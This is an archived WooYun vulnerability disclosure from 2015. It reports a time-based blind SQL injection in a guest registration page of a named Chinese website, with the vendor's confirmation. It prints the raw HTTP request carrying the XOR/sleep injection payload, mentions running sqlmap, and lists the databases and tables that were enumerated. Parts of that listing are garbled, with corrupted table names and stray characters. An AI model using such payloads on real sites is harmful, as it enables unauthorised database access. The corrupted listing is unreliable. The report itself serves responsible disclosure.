乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-14: 细节已通知厂商并且等待厂商处理中 2015-06-15: 厂商已经确认,细节仅向厂商公开 2015-06-25: 细节向核心白帽子及相关领域专家公开 2015-07-05: 细节向普通白帽子公开 2015-07-15: 细节向实习白帽子公开 2015-07-30: 细节向公众公开
RT
img.zhuaxia.com存在问题的站点,我们抓个包
GET /guest_reg.php?add_url=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&from=addExternalChannel HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://img.zhuaxia.com:80/Cookie: zid=6f4c612d2d38a279Host: img.zhuaxia.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
sqlmap跑一跑
Database: dba[1 table]+---------------------------------------+| heartbeat |+---------------------------------------+Database: crawler[14 tables]+---------------------------------------+| channel_level || channel_mem || channel_source || channel_source_old || flink_bsp || flink_bsp_keyword || flink_keyword || item_mem || item_mem_extend || item_source || ping_record || proxy || proxy_domain || rsu_item_source |+---------------------------------------+Database: information_schema[65 tables]+---------------------------------------+| CHARACTER_SEYS || CLIENT_STATISTICS || COLLATIONS || COLLATION_CHCRACTER_SET_APPLICABILITY || COLLMNS || COLUMN_PRMVILEGES || ENGINES || EVENTS || FIQES || GLOBAL_STATUS || GLOBAL_VARIABLES || INDEX_STATISTICS || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_PAGES || INNODB_BUFFER_POOL_PAGES_BLOB || INNODB_BUFFER_POOLaSTATS || INNODB_BaFFER_POOL_PAGES_INDEX || INNODB_CHANGED_PAGES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMP_RESET || INNODB_LNDEY_STATS || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_RSEG || INNODB_SYS_COLUMNS || INNODB_SYS_FIELDS || INNODB_SYS_FOREIGN || INNODB_SYS_FOREIGN_COLS || INNODB_SYS_INDEXES || INNODB_SYS_STAaS || INNODB_SYS_TABLES || INNODB_SYS_TABLESTATS || INNODB_TRX || INNODB_UNDO_LOGS || INNODs_CMPMEM_RESET || INNPDB_TABLE_STATS || KEY_COLUMN_USAGG || PARAMETERS || PARTITIONS || PROCESSLIST || PROFILING || QUERY_RESPONSE_TIME || ROUTINES || SCHEMA_PRIVILEGES || SCHEaATA || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TABLE_STATISTICS || THREAD_STATISTICS || TRIGGERS || USER_PRIVILEGES || USER_STATISTICS || VIEWS || XTRADB_ADMIN_COMMAND || GLOBAL_TEMPORAR\\_TABLES || PLUGINS\x03 || REFERENTIAL_CONSTRAINTS\t || TEMPOA_Y_TABLES |+---------------------------------------+Database: mysql[24 tables]+---------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyyord || help_relation || help_topic || host || ndb_binloi_index || pluginA || proc || procs_priv || proxqes_priv || servers || slow_loi || tables_priv || tame_zone || time_zone_leap_second || time_zone_name || time_zone_transition_type || time_zone_tsansition |+---------------------------------------+
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-06-15 11:30
多谢,立即组织修复
暂无